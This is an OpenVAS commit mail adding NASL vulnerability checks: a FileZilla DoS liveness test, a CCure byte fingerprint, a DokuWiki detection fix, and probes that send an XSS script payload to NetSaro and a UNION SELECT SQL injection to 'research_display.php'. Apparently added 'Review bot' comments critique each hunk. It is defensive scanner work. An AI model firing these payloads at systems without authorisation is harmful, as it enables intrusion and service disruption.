[Openvas-commits] r11543 - in trunk/openvas-plugins: . scripts
scm-commit@wald.intevation.org
scm-commit at wald.intevation.org
Thu Sep 1 14:04:16 CEST 2011
Author: mime
Date: 2011-09-01 14:04:12 +0200 (Thu, 01 Sep 2011)
New Revision: 11543
Added:
trunk/openvas-plugins/scripts/gb_netsaro_49390.nasl
trunk/openvas-plugins/scripts/gb_research_display_49395.nasl
Modified:
trunk/openvas-plugins/ChangeLog
trunk/openvas-plugins/scripts/filezilla_server_port_cmd_dos.nasl
trunk/openvas-plugins/scripts/find_service2.nasl
trunk/openvas-plugins/scripts/gb_dokuwiki_detect.nasl
Log:
Added new plugins. Added new banner submitted by Matthew Coene. Make sure it is really a DokuWiki. Close soc and reopen a new one before testing if the ftpd is up.
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2011-09-01 09:32:45 UTC (rev 11542)
+++ trunk/openvas-plugins/ChangeLog 2011-09-01 12:04:12 UTC (rev 11543)
@@ -1,3 +1,16 @@
+2011-09-01 Michael Meyer <michael.meyer at greenbone.net>
+
+ * scripts/gb_netsaro_49390.nasl,
+ scripts/gb_research_display_49395.nasl:
+ Added new plugins.
+
+ * scripts/gb_dokuwiki_detect.nasl:
+ Make sure it is realy a dokuwiki.
+
+ * scripts/filezilla_server_port_cmd_dos.nasl:
+ Close soc and reopen a new one before testing if the ftpd is
+ up.
+
2011-08-31 Veerendra G.G <veerendragg at secpod.com>
* scripts/secpod_vmware_vfabric_tc_server_security_bypass_vuln.nasl,
Modified: trunk/openvas-plugins/scripts/filezilla_server_port_cmd_dos.nasl
===================================================================
--- trunk/openvas-plugins/scripts/filezilla_server_port_cmd_dos.nasl 2011-09-01 09:32:45 UTC (rev 11542)
+++ trunk/openvas-plugins/scripts/filezilla_server_port_cmd_dos.nasl 2011-09-01 12:04:12 UTC (rev 11543)
@@ -115,8 +115,13 @@
###step 3: attack succeeded?###
###############################
-is_alive = ftp_recv_line(socket:soc);
+close(soc);
+sleep(5);
+
+soc1 = open_sock_tcp(port);
+is_alive = ftp_recv_line(socket:soc1);
+
if (!is_alive) {
report = desc + report;
security_warning(data:report, port:port);
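Review bot: `soc1 = open_sock_tcp(port);` is never checked, so when the reconnect fails `ftp_recv_line(socket:soc1)` is invoked on an invalid handle and the vulnerability report then hinges on that call happening to return nothing; make the intent explicit, e.g. `soc1 = open_sock_tcp(port);` `if(!soc1) is_alive = FALSE;` `else is_alive = ftp_recv_line(socket:soc1);`. A single reconnect after a fixed `sleep(5)` also cannot tell a crashed daemon from one that is merely slow to accept a new connection, so a short retry loop before reporting would cut false positives. The second hunk's `close(soc1);` then runs on whatever open_sock_tcp returned; if the warning branch does not exit, that is a close on a socket that was never opened. The `if (!is_alive) {` block continues past the end of this hunk.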
@@ -124,4 +129,4 @@
#end of exploit, closing open socket
-close(soc);
+close(soc1);
Modified: trunk/openvas-plugins/scripts/find_service2.nasl
===================================================================
--- trunk/openvas-plugins/scripts/find_service2.nasl 2011-09-01 09:32:45 UTC (rev 11542)
+++ trunk/openvas-plugins/scripts/find_service2.nasl 2011-09-01 12:04:12 UTC (rev 11543)
@@ -167,6 +167,40 @@
}
+#0x00: 94 00 00 00 F4 FF FF FF 01 00 00 00 FF FF FF FF ................
+#0x10: 00 00 00 00 A5 00 00 00 00 00 00 00 04 00 00 00 ................
+#0x20: 3E F9 E6 B9 9B FE 6B 7C 2D 69 87 74 0B F3 10 66 >.....k|-i.t...f
+#0x30: 87 C2 A8 59 A6 18 B4 BD AE BF 7A 5A 3A F4 23 AC ...Y......zZ:.#.
+#0x40: F6 E4 FC DE 59 80 0C 9F 05 DD BC E5 7E DE 7D 19 ....Y.......~.}.
+#0x50: DC 7D 34 2F EC 2D 63 5D 2F 4E 35 26 DD 7C C3 AB .}4/.-c]/N5&.|..
+#0x60: AC 13 28 D3 B3 A5 BA F0 FD D6 FA 22 BF 4D F2 4D ..(........".M.M
+#0x70: A6 70 08 98 0E 7D 82 59 D7 F3 87 3B 9E C7 C5 95 .p...}.Y...;....
+#0x80: 06 54 61 43 ED F9 57 BB 50 25 1A B6 A6 61 CE BD .TaC..W.P%...a..
+#0x90: C1 29 69 76 D5 30 10 CC 60 40 48 EF 8D E0 AC 76 .)iv.0..`@H....v
+#0xA0: FF FE FF FE FF FF FB FF CE BE AC AD FF FF 5B FF ..............[.
+#0xB0: FF FF FD FF
+# # submitted by Matthew Coene <mcoene at Bacardi.com> 26.08.11
+
+if(raw_string(
+0x94,0x00,0x00,0x00,0xF4,0xFF,0xFF,0xFF,0x01,0x00,0x00,0x00,0xFF,0xFF,0xFF,0xFF,
+0x00,0x00,0x00,0x00,0xA5,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,
+0x3E,0xF9,0xE6,0xB9,0x9B,0xFE,0x6B,0x7C,0x2D,0x69,0x87,0x74,0x0B,0xF3,0x10,0x66,
+0x87,0xC2,0xA8,0x59,0xA6,0x18,0xB4,0xBD,0xAE,0xBF,0x7A,0x5A,0x3A,0xF4,0x23,0xAC,
+0xF6,0xE4,0xFC,0xDE,0x59,0x80,0x0C,0x9F,0x05,0xDD,0xBC,0xE5,0x7E,0xDE,0x7D,0x19,
+0xDC,0x7D,0x34,0x2F,0xEC,0x2D,0x63,0x5D,0x2F,0x4E,0x35,0x26,0xDD,0x7C,0xC3,0xAB,
+0xAC,0x13,0x28,0xD3,0xB3,0xA5,0xBA,0xF0,0xFD,0xD6,0xFA,0x22,0xBF,0x4D,0xF2,0x4D,
+0xA6,0x70,0x08,0x98,0x0E,0x7D,0x82,0x59,0xD7,0xF3,0x87,0x3B,0x9E,0xC7,0xC5,0x95,
+0x06,0x54,0x61,0x43,0xED,0xF9,0x57,0xBB,0x50,0x25,0x1A,0xB6,0xA6,0x61,0xCE,0xBD,
+0xC1,0x29,0x69,0x76,0xD5,0x30,0x10,0xCC,0x60,0x40,0x48,0xEF,0x8D,0xE0,0xAC,0x76,
+0xFF,0xFE,0xFF,0xFE,0xFF,0xFF,0xFB,0xFF,0xCE,0xBE,0xAC,0xAD,0xFF,0xFF,0x5B,0xFF,
+0xFF,0xFF,0xFD,0xF9) >< buf && (port == 2800 || port == 2500 || port == 2501 || port == 2502 || port == 2503 || port == 2506 || port == 2505 || port == 2600 || port == 2801 || port == 2900)) {
+
+ register_service(port:port, proto:"CCure");
+ security_note(port:port, data:"A Ccure security management solution is running on this port");
+ exit(0);
+
+}
+
# [root at f00dikator new_nasl_mods]# telnet 10.10.10.7 7110
# Trying 10.10.10.7...
# Connected to 10.10.10.7.
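Review bot: The signature passed to `raw_string(...)` ends with `0xFF,0xFF,0xFD,0xF9` (last line of the call) while the hex dump in the comment above it ends with `FF FF FD FF`; one of the two is wrong, and if the comment is the submitted capture the `>< buf` match can never hit. Either change the last byte to `0xFF,0xFF,0xFD,0xFF` or correct the comment so the two agree, and add a line saying which capture the bytes come from. The bytes from offset 0x20 onward also look high-entropy; if they are per-session (a nonce or key material) rather than fixed, matching the whole buffer will only ever fire for this one capture and anchoring on the fixed header and trailer bytes would be more reliable — worth confirming against a second capture. Minor: `proto:"CCure"` and the note text `A Ccure security management solution` spell the product differently.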
Modified: trunk/openvas-plugins/scripts/gb_dokuwiki_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_dokuwiki_detect.nasl 2011-09-01 09:32:45 UTC (rev 11542)
+++ trunk/openvas-plugins/scripts/gb_dokuwiki_detect.nasl 2011-09-01 12:04:12 UTC (rev 11543)
@@ -64,6 +64,11 @@
foreach dir (make_list("/dokuwiki", cgi_dirs()))
{
+
+ req = http_get(item:string(dir + "/feed.php"), port:dokuwikiPort);
+ rcv = http_keepalive_send_recv(port:dokuwikiPort, data:req,bodyonly:0);
+ if("dokuwiki" >!< tolower(rcv))continue;
+
sndReq = http_get(item:string(dir + "/VERSION"), port:dokuwikiPort);
rcvRes = http_keepalive_send_recv(port:dokuwikiPort, data:sndReq, bodyonly:1);
if (rcvRes != NULL)
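Review bot: `if("dokuwiki" >!< tolower(rcv))continue;` looks for the string anywhere in headers plus body (`bodyonly:0`), so an error or redirect page that merely mentions DokuWiki — a proxy error page or a link in a shared template, for instance — would pass the new pre-check and the `/VERSION` fetch would proceed exactly as before. Restricting the check to a successful response tightens it, e.g. `if(isnull(rcv) || !egrep(pattern:"^HTTP/1\.[01] 200", string:rcv) || "dokuwiki" >!< tolower(rcv)) continue;`. A one-line comment such as `# feed.php is served by every DokuWiki install; skip dirs that do not answer with it` would also explain why this probe was chosen. The `foreach dir` loop this hunk sits in continues past the end of the hunk.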
Added: trunk/openvas-plugins/scripts/gb_netsaro_49390.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_netsaro_49390.nasl 2011-09-01 09:32:45 UTC (rev 11542)
+++ trunk/openvas-plugins/scripts/gb_netsaro_49390.nasl 2011-09-01 12:04:12 UTC (rev 11543)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# NetSaro Enterprise Messenger Cross Site Scripting and HTML Injection Vulnerabilities
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103236);
+ script_bugtraq_id(49390);
+ script_version ("1.0-$Revision$");
+
+ script_name("NetSaro Enterprise Messenger Cross Site Scripting and HTML Injection Vulnerabilities");
+
+desc = "Overview:
+NetSaro Enterprise Messenger is prone to multiple cross-site
+scripting and HTML-injection vulnerabilities because it fails to
+properly sanitize user-supplied input before using it in dynamically
+generated content.
+
+Successful exploits will allow attacker-supplied HTML and script
+code to run in the context of the affected browser, potentially
+allowing the attacker to steal cookie-based authentication
+credentials or to control how the site is rendered to the user.
+Other attacks are also possible.
+
+NetSaro Enterprise Messenger 2.0 is vulnerable; other versions may
+also be affected.
+
+References:
+http://www.securityfocus.com/bid/49390
+http://www.netsaro.com/";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if installed NetSaro Enterprise Messenger is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 4990);
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+port = get_http_port(default:4990);
+if(!get_port_state(port))exit(0);
+
+sndReq = http_get(item:"/", port:port);
+rcvRes = http_keepalive_send_recv(port:port, data:sndReq);
+
+if("<title>NetSaro Administration Console</title>" >!< rcvRes)exit(0);
+
+req = string("POST /login.nsp HTTP/1.1\r\n",
+ "Host: ", get_host_name(),"\r\n",
+ "Content-Type: application/x-www-form-urlencoded\r\n",
+ "Content-Length: 131\r\n",
+ "\r\n",
+ "username=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%22openvas-xss-test%22%29%3C%2Fscript%3E&password=&login=Log+In&postback=postback\r\n",
+ "\r\n");
+
+rcvRes = http_keepalive_send_recv(port:port, data:req);
+
+if('"></script><script>alert("openvas-xss-test")</script>"' >< rcvRes) {
+
+ security_warning(port:port);
+ exit(0);
+
+}
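Review bot: `"Content-Length: 131\r\n"` is a hand-counted constant for the body on the following line, so any later edit to the payload silently breaks the request (a wrong length makes the server wait for more data or truncate the body, and the reflection check then fails without explanation); build the body once and derive the header from it, e.g. `data = string("username=%22%3E...&postback=postback\r\n");` then `"Content-Length: ", strlen(data), "\r\n",` and `data` in place of the literal. The trailing `\r\n` inside the body is counted into the 131 and is followed by a second CRLF; if that is deliberate it deserves a comment, otherwise drop it from the body. The success check on `rcvRes` also runs before confirming the response is non-empty, which is fine with `><` but worth a comment so the order is not "fixed" later.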
Property changes on: trunk/openvas-plugins/scripts/gb_netsaro_49390.nasl
___________________________________________________________________
Name: svn:keywords
+ Id Revision
Added: trunk/openvas-plugins/scripts/gb_research_display_49395.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_research_display_49395.nasl 2011-09-01 09:32:45 UTC (rev 11542)
+++ trunk/openvas-plugins/scripts/gb_research_display_49395.nasl 2011-09-01 12:04:12 UTC (rev 11543)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# 'research_display.php' SQL Injection Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103235);
+ script_bugtraq_id(49395);
+ script_version ("1.0-$Revision$");
+
+ script_name("'research_display.php' SQL Injection Vulnerability");
+
+desc = "Overview:
+research_display.php is prone to an SQL-injection vulnerability because it
+fails to sufficiently sanitize user-supplied data before using it in
+an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the
+application, access or modify data, or exploit latent vulnerabilities
+in the underlying database.
+
+References:
+http://www.securityfocus.com/bid/49395";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if research_display.php is prone to an SQL-injection vulnerability");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list(cgi_dirs());
+
+foreach dir (dirs) {
+
+ url = string(dir, "/research_display.php?ID=-null+UNiON+ALL+SELECT+null,null,null,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,null,null,null");
+
+ if(http_vuln_check(port:port, url:url,pattern:"OpenVAS-SQL-Injection-Test")) {
+
+ security_warning(port:port);
+ exit(0);
+
+ }
+}
+
+exit(0);
+
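Review bot: The description never names the application that ships `research_display.php`, so a reader of the report — and of the `script_name` — cannot tell which product is affected or which version range to check; the Overview should open with the product and vendor as given in the referenced advisory, and `script_name` should carry the product name too, e.g. `"<PRODUCT> 'research_display.php' SQL Injection Vulnerability"` with the placeholder filled from the advisory (BID 49395 on the page). The marker `OpenVAS-SQL-Injection-Test` is sent only hex-encoded in the URL, so a page that echoes the request back cannot satisfy `pattern:`; that is worth a one-line comment above the `url =` line so the encoding is not "simplified" later. The hunk is the whole new file, so nothing is cut off.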
Property changes on: trunk/openvas-plugins/scripts/gb_research_display_49395.nasl
___________________________________________________________________
Name: svn:keywords
+ Id Revision